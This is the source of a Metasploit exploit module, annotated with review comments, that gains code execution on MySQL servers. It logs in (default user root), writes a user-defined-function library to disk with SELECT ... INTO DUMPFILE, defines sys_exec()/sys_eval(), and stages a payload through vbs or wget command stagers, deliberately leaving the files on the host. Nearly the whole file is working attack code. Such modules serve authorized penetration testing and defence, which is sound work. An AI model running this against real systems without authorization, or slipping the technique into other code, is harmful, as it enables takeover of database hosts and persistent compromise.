GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/mysql/mysql_udf_payload.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MYSQL
  include Msf::Exploit::CmdStager
  include Msf::OptionalSession::MySQL

  # Module metadata and options.
  #
  # The description is also the module's own statement of the artifacts it
  # leaves on the host (a payload executable, the UDF library, and the
  # sys_eval()/sys_exec() function definitions in the mysql schema); those are
  # the durable indicators a defender can audit for after the fact.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle MySQL UDF Payload Execution',
        'Description' => %q{
          This module creates and enables a custom UDF (user defined function) on the
          target host via the SELECT ... into DUMPFILE method of binary injection. On
          default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
          permissions not enforced, and the MySQL service runs as LocalSystem.

          NOTE: This module will leave a payload executable on the target system when the
          attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
          and sys_exec() functions.
        },
        'Author' =>
          [
            'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
            'todb', # this Metasploit module
            'h00die' # linux addition
          ],
        'License' => MSF_LICENSE,
        'References' =>
          [
            # Bernardo's work with cmd exec via udf
            [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
          ],
        'Platform' => ['win', 'linux'],
        'Targets' =>
          [
            [ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
            [ 'Linux', {'CmdStagerFlavor' => 'wget' } ]
          ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-01-16' # Date of Bernardo's blog post.
      ))
    register_options(
      [
        # Defaults to false: an existing sys_exec() is reused when the check in
        # login_and_get_sys_exec finds one, so no new library is written.
        OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]),
        OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ])
      ])
  end

  # Framework hook; always true here.
  # NOTE(review): presumably marks this module as post-authentication (it needs
  # a valid MySQL login or an existing session) — confirm against the
  # Msf::Exploit documentation.
  def post_auth?
    true
  end

  # MySQL username, read from the USERNAME option registered above (default 'root').
  def username
    datastore['USERNAME']
  end

  # MySQL password from the PASSWORD option.
  # NOTE(review): PASSWORD is not registered in this file; it looks like it
  # comes from the Msf::Exploit::Remote::MYSQL mixin — verify.
  def password
    datastore['PASSWORD']
  end

  # Obtains a MySQL connection (existing session or fresh login), records the
  # server architecture in @mysql_arch and whether sys_exec() is callable in
  # @mysql_sys_exec_available, adding the UDF when it is absent or
  # FORCE_UDF_UPLOAD is set.
  #
  # Returns the value of mysql_login (truthy on success) in the login path.
  # NOTE(review): in the session path `m` is never assigned, so `return m`
  # yields nil even though the connection was set up; `exploit` treats a nil
  # return as failure and exits before staging, so the session path looks
  # unreachable in practice — confirm intent before relying on OptionalSession.
  def login_and_get_sys_exec
    # If we have a session make use of it
    if session
      print_status("Using existing session #{session.sid}")
      self.mysql_conn = session.client
    else
      # otherwise fallback to attempting to login
      m = mysql_login(username,password,'mysql')
      return unless m
    end

    @mysql_arch = mysql_get_arch
    @mysql_sys_exec_available = mysql_check_for_sys_exec()
    if !@mysql_sys_exec_available || datastore['FORCE_UDF_UPLOAD']
      # This is the step that writes the UDF library and (re)defines the
      # functions named in the description; the re-check afterwards is what
      # decides whether staging proceeds.
      mysql_add_sys_exec
      @mysql_sys_exec_available = mysql_check_for_sys_exec()
    else
      print_status "sys_exec() already available, using that (override with FORCE_UDF_UPLOAD)."
    end

    return m
  end

  # CmdStager callback: each staged command line is run through the
  # sys_exec() UDF. `opts` is part of the CmdStager callback signature and is
  # unused here; the VERBOSE option is forwarded to mysql_sys_exec.
  def execute_command(cmd, opts)
    mysql_sys_exec(cmd, datastore['VERBOSE'])
  end

  # Entry point: connect and make sys_exec() available, reject unsupported
  # architectures, then stage the payload through the command stager and start
  # the handler. Returns early (without disconnecting) whenever a precondition
  # fails; disconnect only runs on the successful path.
  def exploit
    m = login_and_get_sys_exec()

    if not m
      return
    elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch)
      print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
      return
    else
      if @mysql_sys_exec_available
        # :nodelete keeps the staged files on the host, matching the NOTE in
        # the description about artifacts left behind.
        execute_cmdstager({:linemax => 1500, :nodelete => true})
        handler
      else
        print_status("MySQL function sys_exec() not available")
        return
      end
    end
    disconnect
  end
end